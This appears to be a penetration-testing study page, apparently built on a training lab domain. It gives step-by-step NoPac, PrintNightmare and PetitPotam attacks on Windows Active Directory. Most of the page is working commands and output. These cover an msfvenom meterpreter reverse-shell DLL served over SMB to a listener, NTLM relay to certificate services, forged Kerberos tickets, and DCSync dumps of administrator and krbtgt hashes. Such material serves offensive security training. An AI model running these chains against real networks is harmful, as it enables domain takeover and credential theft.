πͺBleeding Edge Vulnerabilities
NoPac (SamAccountName Spoofing)
Nopac or the Same_TheAdmin vulnerability is an emerging threat released at the end of 2021. The attack is made up of two CVEs: 2021-42278 and 2021-42287
These may allow the attacker intra-domain privilege escalation from any standard user to Domain Admin level access.
The flow of the attack can be seen here
NoPac uses a tool in Impacket to communicate with. upload a payload and issue a command from the attack host to the target DC.
Installation
git clone https://github.com/Ridter/noPac.gitScanning for NoPac
We can use NoPac to check if the system is vulnerable, we use a standard domain user to attempt to gain a TGT from the target DC. If we see ms-DS-MachineAccountQuota = 10 we know it is vulnerable but if ms-DS-MachineAccountQuota = 0 the attack will fail because our user does not have the rights to add a new machine account.
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.5.5. Ticket size 1484
[*] Got TGT from ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. Ticket size 663Getting a Shell
Once we know the system is vulnerable, we can attempt to get a shell with SYSTEM-level privileges.
We should not that this could be considered "noisy" and may be blocked by AV programs
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldapDCSync the Built-in Admin Account
If successful we will now have a .local.cache file on our host.
We can use the file to perform a pass-the-ticket and perform a DCSync attack
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administratorPrintNightmare
PrintNightmare is a vulnerability found in the Print Spooler service that runs on all Windows OSs. Many exploits have been created based on this to allow privilege escalation and remote code execution.
Install Exploit
git clone https://github.com/cube0x0/CVE-2021-1675.gitInstall cube0x0's Version of Impacket
We must make sure that we are using the correct version of Impacket,
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py installEnumerating for MS-RPRN
We can use the below command to see if Print System Asynchronous Protocol and Print System Remote Protocol are exposed on the target. Once confirmed we can move onto the next step.
rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'Generating a DLL Payload
We craft a DLL payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dllGenerate a Share with smbserver.py
We will host the payload in an SMB share
sudo smbserver.py -smb2support CompData /path/to/backupscript.dllSetting us MSF multi/handler
Once the share is created and hosting our payload we can set up a listener to catch the reverse shell
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST 172.16.5.225
LHOST => 10.3.88.114
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LPORT 8080
LPORT => 8080
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run
[*] Started reverse TCP handler on 172.16.5.225:8080 Running the Exploit
We make sure to have \\<ip address of attack host>\ShareName\nameofpayload.dll in our command then we can finally run the exploit, if it is successful we will receive an elevated SYSTEM shell.
sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\systemPetitPotam (MS-EFSRPC)
PetitPotam is an LSA spoofing vulnerability that was patched in 2021. The exploit allows an unauthenticated attacker to coerce a DC to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC).
This allows an attacker to take over a Windows domain where Active Directory Certificate Server (AD CS) is in use.
In the attack, an auth request from the target DC is relayed to the CA host's Web Enrollment page and makes a Certificate Signing Request (CSR) for a new certificate. This certificate can be used with a tool such as Rubues or gettgtpkinit.py to request a TGT for the DC.
To find the location of the CA we can use a tool like https://github.com/zer1t0/certi.
Starting ntlmrelayx.py
We first start ntlmrelayx.py specifying the enrollment URL for the CA host.
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
[*] Setting up WCF Server
[*] Servers started, waiting for connectionsRunning PetitPotam
In another window, we can start PeitiPotam and pass in the attack host IP and DC IP.
python3 PetitPotam.py 172.16.5.225 172.16.5.5
Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.5.5[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!Catching Base64 Encoded Certificate for DC01
If the login was successful we can try and obtain a base64 cert for the DC
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainControllerRequesting a TGT
We can use the base64 cert with gettgtpkinit.py to request a TGT for the DC
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccacheSetting the KRB5CCNAME Env Variable
The TGT was saved as dc01.cache file which we can pass into the KRB5CCNAME env variable so our attack host used this file for Kerberos authentication attempts.
export KRB5CCNAME=dc01.ccacheUsing Domain Controller TGT to DCSync
We can use this TGT with secretsdump.py to perform a DCSync and retrieve one or all NTLM hashes for the domain
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCALConfirming Admin Access to the DC
crackmapexec smb 172.16.5.5 -u administrator -H 88ad09182de639ccc6579eb0849751cfSubmitting a TGS Request for Ourselves using getnthash.py
We can use the tool getnthash.py to request the NT hash for our target using Kerberos U2U to submit a TGS request with the Privileged Attribute Certificate (PAC).
python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$Using DC NTLM Hash to DCSync
We can use the obtained hash to perform a DCSync
secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4baRequesting TGT with Rubeus
We could alternatively use the certificate we got earlier with Ruebus on the Windows attack host to request a TGT ticket and perform a PTT attack
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC...SNIP...IkHS2vJ51Ry4= /ptt
[+] Ticket successfully imported!
ServiceName : krbtgt/INLANEFREIGHT.LOCAL
ServiceRealm : INLANEFREIGHT.LOCAL
UserName : ACADEMY-EA-DC01$
UserRealm : INLANEFREIGHT.LOCAL
StartTime : 3/30/2022 3:50:25 PM
EndTime : 3/31/2022 1:50:25 AM
RenewTill : 4/6/2022 3:50:25 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : d/AohN1w1ZZXsks8cCUlbg==
ASREP (key) : 2A621F62C32241F38FA68826E95521DDConfirming the Ticket is in Memory
We can check to see if the ticket is in memory
klistPerforming DCSysnc with Mimikatz
Finally, we can perform the attack with the PTT.
PS C:\Tools> cd .\mimikatz\x64\
PS C:\Tools\mimikatz\x64> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'inlanefreight\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 10/27/2021 8:14:34 AM
Object Security ID : S-1-5-21-3842939050-3880317879-2865463114-502
Object Relative ID : 502
Credentials:
Hash NTLM: 16e26ba33e455a8c338142af8d89ffbc
ntlm- 0: 16e26ba33e455a8c338142af8d89ffbc
lm - 0: 4562458c201a97fa19365ce901513c21Last updated
Was this helpful?